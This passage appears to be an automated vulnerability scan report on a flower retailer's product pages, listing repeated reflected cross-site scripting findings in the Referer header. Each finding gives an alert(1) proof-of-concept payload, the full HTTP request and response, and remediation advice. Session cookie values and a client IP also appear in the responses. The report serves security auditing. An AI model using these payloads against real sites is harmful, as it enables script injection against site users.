Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/20-Christmas-Tulips-wFREE-Candy-Cane-Vase--Chocolates-30001707 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fcfda\"%3balert(1)//38795a5ce05

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=xsdzp53wckd5ps1z3graul14; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=xsdzp53wckd5ps1z3graul14; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pjt-1,cnd-32,pvo-2,pbr-3,psk-1,pps-1,poe-1,zzc-1,pjs-1,pcu-1,pfl-1,mpsmediapersonalitysplit-2,ntd-2,nte-2,ntc-2,peo-1,pfp-1,phr-1,zza-1,psv-3,nta-1,ntb-2,pmo-1,ppr-1,spg-2,xpc-1,psr-1,pcy-8,zzb-1,gfr-2,apg-2,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:54:01 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:54:01 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=76; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:54:01 GMT; path=/
Set-Cookie: PFC_BrowserId=9e9b718d-10a5-4c0c-bf71-c80f56c2cd09; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30001707&12/16/2010 11:54:03 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:54:03 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:54:03 GMT
Connection: close
Content-Length: 153148


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30001707","30001707","30001707","122264","76","organicgglgeneric_fcfda\\";alert(1)//38795a5ce05","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pfl-1,cnd-32,pvo-2,pbr-3,pcy-8,psk-1,poe-1,zzc-1,pjs-1,pcu-1,spg-2,mpsmediapersonalitysplit-2,ntd-2,nte-2,ntc-2,peo-1,pfp-1,phr-1,pjt-1,psv-3,
...[SNIP]...

2.130. http://products.proflowers.com/flowers/50-Blooms-of-Garden-Spray-Roses-30002721 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/50-Blooms-of-Garden-Spray-Roses-30002721

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 696e3\"%3balert(1)//988dfc7e81a was submitted in the Referer HTTP header. This input was echoed as 696e3\\";alert(1)//988dfc7e81a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/50-Blooms-of-Garden-Spray-Roses-30002721 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=696e3\"%3balert(1)//988dfc7e81a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=1edq55yhgkc44jhkvmkv5cls; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=1edq55yhgkc44jhkvmkv5cls; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pjt-1,cnd-31,pvo-1,pbr-4,psk-1,pps-2,poe-2,zzc-2,pjs-2,pcu-1,pfl-2,mpsmediapersonalitysplit-1,ntd-1,nte-3,ntc-1,peo-2,pfp-2,phr-2,zza-2,psv-3,nta-2,ntb-2,pmo-1,ppr-1,spg-1,xpc-1,psr-2,pcy-6,zzb-1,gfr-1,apg-2,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:53:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:53:59 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=73; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:53:59 GMT; path=/
Set-Cookie: PFC_BrowserId=16a6f719-94a4-47f1-a028-a23174564742; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30002721&12/16/2010 11:54:01 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:54:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:54:02 GMT
Connection: close
Content-Length: 156109


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30002721","30002721","30002721","138341","73","organicgglgeneric_696e3\\";alert(1)//988dfc7e81a","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pfl-2,cnd-31,pvo-1,pbr-4,pcy-6,psk-1,poe-2,zzc-2,pjs-2,pcu-1,spg-1,mpsmediapersonalitysplit-1,ntd-1,nte-3,ntc-1,peo-2,pfp-2,phr-2,pjt-1,psv-3,
...[SNIP]...

2.131. http://products.proflowers.com/flowers/75-Blooms-of-Candy-Cane-Peruvian-Lilies-30006510 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/75-Blooms-of-Candy-Cane-Peruvian-Lilies-30006510

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46095\"%3balert(1)//2ecb8b37f73 was submitted in the Referer HTTP header. This input was echoed as 46095\\";alert(1)//2ecb8b37f73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/75-Blooms-of-Candy-Cane-Peruvian-Lilies-30006510 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=46095\"%3balert(1)//2ecb8b37f73

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=zfqsgi1kmaqwmwkuwofwu43f; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=zfqsgi1kmaqwmwkuwofwu43f; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pjt-2,cnd-32,pvo-1,pbr-4,psk-1,pps-2,poe-2,zzc-2,pjs-1,pcu-1,pfl-1,mpsmediapersonalitysplit-1,ntd-2,nte-1,ntc-1,peo-2,pfp-1,phr-2,zza-1,psv-4,nta-2,ntb-2,pmo-1,ppr-1,spg-1,xpc-1,psr-1,pcy-6,zzb-2,gfr-2,apg-1,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:55:00 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:55:00 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=148; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:55:00 GMT; path=/
Set-Cookie: PFC_BrowserId=1cac6cef-37f2-4b52-a10f-06cc54306fdf; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30006510&12/16/2010 11:55:02 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:55:02 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:55:02 GMT
Connection: close
Content-Length: 155381


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30006510","30006510","30006510","230873","148","organicgglgeneric_46095\\";alert(1)//2ecb8b37f73","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pfl-1,cnd-32,pvo-1,pbr-4,pcy-6,psk-1,poe-2,zzc-2,pjs-1,pcu-1,spg-1,mpsmediapersonalitysplit-1,ntd-2,nte-1,ntc-1,peo-2,pfp-1,phr-2,pjt-2,psv-4,
...[SNIP]...

2.132. http://products.proflowers.com/flowers/75-Blooms-of-Candy-Cane-Peruvian-Lilies-with-Chocolates-30046079 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/75-Blooms-of-Candy-Cane-Peruvian-Lilies-with-Chocolates-30046079

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50620\"%3balert(1)//ce51515fe12 was submitted in the Referer HTTP header. This input was echoed as 50620\\";alert(1)//ce51515fe12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/75-Blooms-of-Candy-Cane-Peruvian-Lilies-with-Chocolates-30046079 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=50620\"%3balert(1)//ce51515fe12

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=wnrrdkkbvlsess5gx1iim5fl; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=wnrrdkkbvlsess5gx1iim5fl; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-1,pso-1,pjt-1,cnd-33,pvo-1,pbr-3,psk-2,pps-1,poe-1,zzc-2,pjs-2,pcu-1,pfl-2,mpsmediapersonalitysplit-1,ntd-1,nte-3,ntc-2,peo-1,pfp-2,phr-2,zza-1,psv-3,nta-1,ntb-1,pmo-1,ppr-1,spg-1,xpc-1,psr-2,pcy-6,zzb-2,gfr-2,apg-2,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:54:07 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:54:07 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=95; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:54:07 GMT; path=/
Set-Cookie: PFC_BrowserId=d6aeed29-18ee-4a55-9c4e-0d8e70dd6ae7; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30046079&12/16/2010 11:54:09 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:54:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:54:10 GMT
Connection: close
Content-Length: 195543


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30046079","30046079","30046079","402911","95","organicgglgeneric_50620\\";alert(1)//ce51515fe12","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-1,pso-1,pfl-2,cnd-33,pvo-1,pbr-3,pcy-6,psk-2,poe-1,zzc-2,pjs-2,pcu-1,spg-1,mpsmediapersonalitysplit-1,ntd-1,nte-3,ntc-2,peo-1,pfp-2,phr-2,pjt-1,psv-3,
...[SNIP]...

2.133. http://products.proflowers.com/flowers/A-Little-Sunshine-30002558 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/A-Little-Sunshine-30002558

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63074\"%3balert(1)//7077c0e8731 was submitted in the Referer HTTP header. This input was echoed as 63074\\";alert(1)//7077c0e8731 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/A-Little-Sunshine-30002558 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=63074\"%3balert(1)//7077c0e8731

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=jadgbjpznzlmwzt02gtiq0u0; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=jadgbjpznzlmwzt02gtiq0u0; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-1,pso-1,pjt-2,cnd-33,pvo-1,pbr-4,psk-1,pps-2,poe-1,zzc-2,pjs-3,pcu-1,pfl-1,mpsmediapersonalitysplit-1,ntd-1,nte-3,ntc-1,peo-1,pfp-1,phr-2,zza-1,psv-3,nta-2,ntb-1,pmo-1,ppr-1,spg-1,xpc-1,psr-1,pcy-6,zzb-1,gfr-2,apg-2,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:55:01 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:55:01 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=118; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:55:01 GMT; path=/
Set-Cookie: PFC_BrowserId=eeef7ddb-88f4-4674-98bd-5af5bc606a72; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30002558&12/16/2010 11:55:04 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:55:04 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:55:04 GMT
Connection: close
Content-Length: 177731


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30002558","30002558","30002558","131907","118","organicgglgeneric_63074\\";alert(1)//7077c0e8731","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-1,pso-1,pfl-1,cnd-33,pvo-1,pbr-4,pcy-6,psk-1,poe-1,zzc-2,pjs-3,pcu-1,spg-1,mpsmediapersonalitysplit-1,ntd-1,nte-3,ntc-1,peo-1,pfp-1,phr-2,pjt-2,psv-3,
...[SNIP]...

2.134. http://products.proflowers.com/flowers/All-the-Frills-30003887 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/All-the-Frills-30003887

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd111\"%3balert(1)//aa4f513a9a was submitted in the Referer HTTP header. This input was echoed as cd111\\";alert(1)//aa4f513a9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/All-the-Frills-30003887 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=cd111\"%3balert(1)//aa4f513a9a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=5o4lphbylmys0pdzdqxblwzg; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=5o4lphbylmys0pdzdqxblwzg; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pjt-2,cnd-33,pvo-2,pbr-4,psk-2,pps-2,poe-1,zzc-2,pjs-2,pcu-1,pfl-1,mpsmediapersonalitysplit-2,ntd-1,nte-1,ntc-1,peo-1,pfp-2,phr-1,zza-2,psv-3,nta-2,ntb-2,pmo-1,ppr-1,spg-2,xpc-1,psr-2,pcy-5,zzb-2,gfr-2,apg-1,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:55:04 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:55:04 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=57; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:55:04 GMT; path=/
Set-Cookie: PFC_BrowserId=7006c95e-9f42-4235-b672-1164df3291d6; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30003887&12/16/2010 11:55:06 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:55:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:55:06 GMT
Connection: close
Content-Length: 195824


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30003887","30003887","30003887","170950","57","organicgglgeneric_cd111\\";alert(1)//aa4f513a9a","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pfl-1,cnd-33,pvo-2,pbr-4,pcy-5,psk-2,poe-1,zzc-2,pjs-2,pcu-1,spg-2,mpsmediapersonalitysplit-2,ntd-1,nte-1,ntc-1,peo-1,pfp-2,phr-1,pjt-2,psv-3,
...[SNIP]...

2.135. http://products.proflowers.com/flowers/Christmas-Fruit-Basket-30040149 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Christmas-Fruit-Basket-30040149

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4ea6\"%3balert(1)//d0957e0f75c was submitted in the Referer HTTP header. This input was echoed as d4ea6\\";alert(1)//d0957e0f75c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Christmas-Fruit-Basket-30040149 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d4ea6\"%3balert(1)//d0957e0f75c

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=mkmrgu0iojoyet3mnq4wexqd; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=mkmrgu0iojoyet3mnq4wexqd; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-1,pso-1,pjt-2,cnd-30,pvo-1,pbr-4,psk-2,pps-2,poe-2,zzc-2,pjs-1,pcu-1,pfl-2,mpsmediapersonalitysplit-1,ntd-2,nte-1,ntc-2,peo-2,pfp-2,phr-2,zza-2,psv-3,nta-1,ntb-1,pmo-1,ppr-1,spg-1,xpc-1,psr-2,pcy-7,zzb-2,gfr-2,apg-1,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:54:08 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:54:08 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=5; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:54:08 GMT; path=/
Set-Cookie: PFC_BrowserId=67dc58b9-6a9e-41e9-8bb4-8ef915641970; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30040149&12/16/2010 11:54:09 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:54:09 GMT; path=/
